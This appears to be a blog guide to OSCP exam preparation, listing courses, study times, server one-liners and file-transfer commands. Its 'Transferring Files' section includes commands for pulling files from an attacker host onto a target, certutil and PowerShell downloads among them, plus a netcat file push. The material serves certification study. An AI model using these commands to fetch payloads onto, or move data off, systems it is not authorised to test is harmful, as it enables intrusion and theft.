So you are looking to become an Offensive Security Certified Professional (OSCP)?

You have come to the right place! This guide is intended to help those at every level, beginner through advanced, prepare for the OSCP exam. Recommended courses, resources and tools will be provided. The guide is aimed at three skill levels: beginner, intermediate, and advanced.

Each of the categories is defined in the following way:

  • Beginner — No penetration testing or capture-the-flag (CTF) experience, but has knowledge of networking topics (Network+, CCNA, Open Systems Interconnection model, etcetera). No Active Directory (AD) configuration experience.
  • Intermediate — Has some CTF, red teaming, or penetration testing experience as well as beginner level penetration testing certifications (eJPT, PenTest+, etcetera). Some AD configuration experience.
  • Advanced — Experienced penetration tester holding advanced penetration testing certifications (PNPT, CRTP, eCPPTv2, etcetera). Experienced in AD.

Courses

Within this section I will list courses for individuals in each level. Please be realistic in determining the level that applies to you as starting off on the wrong path can be costly. I highly suggest reviewing the PEN-200 course syllabus to help you gauge your level.

The courses mentioned below are by no means the only way to pass the exam. You will notice that some courses are found in more than one section. This is because some of the materials within the course apply to more than one skill level, or fall somewhere in between.

NOTE: I did not enroll in all of the courses listed. If interested in learning about my preparation and experience, please click here. These courses are not listed in any particular order and prices are subject to change.

Beginner

The following courses are for my readers who are beginners in the world of penetration testing.

  • PEN-100 course ($799) — This course is offered by Offensive Security and teaches Linux basics, Windows basics, networking, and scripting. The PEN-100 is part of the one-year subscription package, Learn Fundamentals, which also includes access to SOC-100, WEB-100, EXP-100, and CLD-100. This course primes beginners for the SOC-200 course.
  • Practical Ethical Hacking course ($29.99) — TCM Security offers this course, which includes 25 hours of up-to-date practical hacking techniques. You are also guided on setting up your own AD lab environment and how to attack it.
  • Linux Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Linux privilege escalation techniques, covering kernel exploits, password hunting, file permissions, SUID attacks, shared object injection, and more.
  • Windows Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Windows privilege escalation techniques, covering kernel exploits, impersonation attacks, registry attacks, startup applications, DLL hijacking, service permissions, and more.
  • Offensive Pentesting Learning Path ($9.99/month) — TryHackMe offers an offensive penetration testing learning path designed to help students prepare for certifications like the OSCP.
  • Penetration Testing Student Learning Path ($39/month) — Offered by INE, you will have access to material centered around beginner penetration testing, helping students prepare for the eJPT exam.

Intermediate

For those at an intermediate level, I suggest looking into the following courses.

  • PEN-200 course ($1499) — The PEN-200 course offered by Offensive Security is the staple course for the OSCP exam. The materials found in the course were specifically crafted to help students learn the skills needed for the exam. You will receive an online PDF (also available for download), access to a lab environment containing over 70 machines, and videos covering all of the topics.
  • Practical Ethical Hacking course ($29.99) — TCM Security offers this course, which includes 25 hours of up-to-date practical hacking techniques. You are also guided on setting up your own AD lab environment and how to attack it.
  • Linux Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Linux privilege escalation techniques, covering kernel exploits, password hunting, file permissions, SUID attacks, shared object injection, and more.
  • Windows Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Windows privilege escalation techniques, covering kernel exploits, impersonation attacks, registry attacks, startup applications, DLL hijacking, service permissions, and more.

Advanced

If you are at an advanced level, the PEN-200 course is really all you need. I even feel comfortable suggesting the Practical Ethical Hacking course from TCM Security as being enough to pass the exam. This advice is only applicable if you are truly at an advanced level.

  • PEN-200 course ($1499) — The PEN-200 course offered by Offensive Security is the staple course for the OSCP exam. The materials found in the course were specifically crafted to help students learn the skills needed for the exam. You will receive an online PDF (also available for download), access to a lab environment containing over 70 machines, and videos covering all of the topics.
  • Practical Ethical Hacking course ($29.99) — TCM Security offers this course, which includes 25 hours of up-to-date practical hacking techniques. You are also guided on setting up your own AD lab environment and how to attack it.

A Quick Word on The PEN-200 Course

Some of you are probably thinking that the PEN-200 course should be enough to pass no matter what level you are on. If time is not a factor and you are not concerned with the hefty price tag, the course alone is enough for all levels. The cost of the course will increase pro rata with study time, of course. The table below breaks down how long you should expect to study the PEN-200 at each level.

Beginner 10–12 months, Intermediate 6–10 months, Advanced 3–6 months
Table 1: Expected Study Time on PEN-200 Course Per Skill Level

Resources

The following resources can be used to complement your learning at all levels.

Cheat Sheets

In this section you will find a few handy cheat sheets to help you on assessments.

Active Directory

Windows Privilege Escalation

Linux Privilege Escalation

Tools to Know

You should become familiar with all of the tools in the following list. They are not the only tools you need to learn for the exam. I simply found these tools to be extremely helpful in my own preparation.

Windows

Linux

Servers

In this section you will find several one-liners for starting servers that help transfer files from Linux systems.

python3 http server

┌──(N3NU㉿kali)-[~]
└─$ python3 -m http.server 80

python2 http server

┌──(N3NU㉿kali)-[~]
└─$ python2 -m SimpleHTTPServer 80

php http server

┌──(N3NU㉿kali)-[~]
└─$ php -S 0.0.0.0:80

ruby http server

┌──(N3NU㉿kali)-[~]
└─$ ruby -run -e httpd . -p 80

python3 ftp server

┌──(N3NU㉿kali)-[~]
└─$ python3 -m pyftpdlib -p 21

smb server

┌──(N3NU㉿kali)-[~]
└─$ impacket-smbserver Share .

Transferring Files

In this section I will provide a few methods of transferring files during engagements.

NOTE: The attacker IP address is 10.10.10.10 and the target IP is 20.20.20.20

Windows

certutil

C:\>certutil -urlcache -f http://10.10.10.10/file.txt file.txt

Powershell

C:\>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.txt', 'file.txt')

net use

C:\>net use * \\10.10.10.10\Share

ftp

C:\>ftp 10.10.10.10

Linux

wget

┌──(kali㉿kali)-[~]
└─$ wget http://10.10.10.10/file.txt -O file.txt

curl

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.10.10/file.txt -o file.txt

scp

┌──(kali㉿kali)-[~]
└─$ scp N3NU@10.10.10.10:/home/N3NU/file.txt kali@20.20.20.20:/tmp/

nc

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444 > file.txt
┌──(N3NU㉿kali)-[~]
└─$ nc 20.20.20.20 4444 < file.txt
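
None of the transfer methods above confirms that the file arrived intact, and nc in particular leaves a truncated file without any error if the connection drops. The following is an added example, not part of the original guide: the function names make_manifest and verify_manifest and the one-line manifest format are hypothetical, and it assumes coreutils sha256sum and wc are available.

```shell
# Added example; make_manifest / verify_manifest and the manifest line format
# are hypothetical names chosen here. Assumes coreutils sha256sum and wc.

# Sender: emit "<sha256> <bytes> <name>" for a file before it is transferred.
make_manifest() {
    local f hash size
    f=$1
    [ -f "$f" ] || { echo "no such file: $f" >&2; return 2; }
    hash=$(sha256sum < "$f" | cut -d' ' -f1)
    size=$(wc -c < "$f" | tr -d ' ')
    printf '%s %s %s\n' "$hash" "$size" "$(basename "$f")"
}

# Receiver: compare the received file with the sender's manifest line.
# Return codes: 0 intact, 1 size differs (truncated or padded transfer),
# 3 same size but different content, 2 missing file or malformed manifest.
verify_manifest() {
    local line f want_hash want_size got_hash got_size
    line=$1
    f=$2
    [ -f "$f" ] || { echo "missing: $f" >&2; return 2; }
    want_hash=${line%% *}          # first field
    want_size=${line#* }           # drop first field
    want_size=${want_size%% *}     # keep second field
    case $want_hash in
        *[!0-9a-f]*|'') echo "bad hash in manifest" >&2; return 2 ;;
    esac
    [ "${#want_hash}" -eq 64 ] || { echo "bad hash length" >&2; return 2; }
    case $want_size in
        *[!0-9]*|'') echo "bad size in manifest" >&2; return 2 ;;
    esac
    got_size=$(wc -c < "$f" | tr -d ' ')
    if [ "$got_size" -ne "$want_size" ]; then
        echo "size mismatch: got $got_size, expected $want_size" >&2
        return 1
    fi
    got_hash=$(sha256sum < "$f" | cut -d' ' -f1)
    if [ "$got_hash" != "$want_hash" ]; then
        echo "hash mismatch for $f" >&2
        return 3
    fi
    echo "OK $f"
}
```

Run make_manifest on the sending host and carry the printed line across with the file. On a Windows target, certutil -hashfile file.txt SHA256 prints the hash to compare by hand.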

This is a living document; I will continue to update it as I review more of my notes and receive feedback.

I am soon releasing blogs covering how to use some of the tools mentioned above, do not miss out! Feel free to also follow me on LinkedIn.

Until next time…

N3NU

Disclaimer: My content is for informational and educational purposes only. You may try out these hacks on your own computer at your own risk.
